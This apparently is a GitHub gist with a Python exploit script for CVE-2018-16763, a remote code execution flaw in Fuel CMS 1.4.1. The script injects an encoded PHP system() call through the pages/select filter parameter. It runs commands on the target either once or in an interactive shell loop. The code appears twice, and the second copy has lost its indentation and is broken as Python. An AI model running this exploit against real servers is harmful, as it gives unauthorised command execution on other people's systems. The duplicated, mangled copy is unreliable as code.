sdushantha/cve-2018-16763.py

## cve-2018-16763.py
#!/usr/bin/python3
#
# POC of RCE on Fuel CMS v1.4.1 (CVE-2018-16763)
#
# Original author: Padsala Trushal
# Modified by: Siddharth Dushantha
#
# Modifications that've been made:
#  - Cleaned output so that the word 'system' did not
#    appear in every output
#  - Excluded colorama as it was unnecessary
#  - Added ability
#    - to directly execute a command
#    - to interactivly execute commands
#  - Restrucuted the code for better legibility
#
# Original: https://www.exploit-db.com/exploits/50477
#

import requests
from urllib.parse import quote
import argparse
import sys
import re


def execute_command(url, command):
    main_url = f"{url}/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27{quote(command)}%27%29%2b%27"
    r = requests.get(main_url)
    if r.status_code != 200:
        print(f"Error: Unable to connect to {url}")
        sys.exit()

    html = r.text
    output = re.findall("system(.+?)<div", html, re.DOTALL)[0].strip()
    return output


def main():
    parser = argparse.ArgumentParser()

    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-i", "--interactive", action="store_true", help="Enable interactive mode")
    group.add_argument("-c", "--command", metavar="CMD", help="Command to execute")
    parser.add_argument("-u", "--url", required=True, help="Target URL")

    args = parser.parse_args()

    url = args.url
    command = args.command
    interactive = args.interactive

    if not url.startswith(('http://', 'https://')):
        print("Error: Make sure the URL starts with http:// or https://")
        sys.exit()

    if interactive:
        while True:
            command = input("$ ")
            if command == "exit":
                sys.exit()

            output = execute_command(url, command)
            print(output, end="\n\n")

    if command:
        output = execute_command(url, command)
        print(output)


if __name__ == "__main__":
    main()
	#!/usr/bin/python3
	#
	# POC of RCE on Fuel CMS v1.4.1 (CVE-2018-16763)
	#
	# Original author: Padsala Trushal
	# Modified by: Siddharth Dushantha
	#
	# Modifications that've been made:
	# - Cleaned output so that the word 'system' did not
	# appear in every output
	# - Excluded colorama as it was unnecessary
	# - Added ability
	# - to directly execute a command
	# - to interactivly execute commands
	# - Restrucuted the code for better legibility
	#
	# Original: https://www.exploit-db.com/exploits/50477
	#

	import requests
	from urllib.parse import quote
	import argparse
	import sys
	import re


	def execute_command(url, command):
	main_url = f"{url}/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27{quote(command)}%27%29%2b%27"
	r = requests.get(main_url)
	if r.status_code != 200:
	print(f"Error: Unable to connect to {url}")
	sys.exit()

	html = r.text
	output = re.findall("system(.+?)<div", html, re.DOTALL)[0].strip()
	return output


	def main():
	parser = argparse.ArgumentParser()

	group = parser.add_mutually_exclusive_group(required=True)
	group.add_argument("-i", "--interactive", action="store_true", help="Enable interactive mode")
	group.add_argument("-c", "--command", metavar="CMD", help="Command to execute")
	parser.add_argument("-u", "--url", required=True, help="Target URL")

	args = parser.parse_args()

	url = args.url
	command = args.command
	interactive = args.interactive

	if not url.startswith(('http://', 'https://')):
	print("Error: Make sure the URL starts with http:// or https://")
	sys.exit()

	if interactive:
	while True:
	command = input("$ ")
	if command == "exit":
	sys.exit()

	output = execute_command(url, command)
	print(output, end="\n\n")

	if command:
	output = execute_command(url, command)
	print(output)


	if __name__ == "__main__":
	main()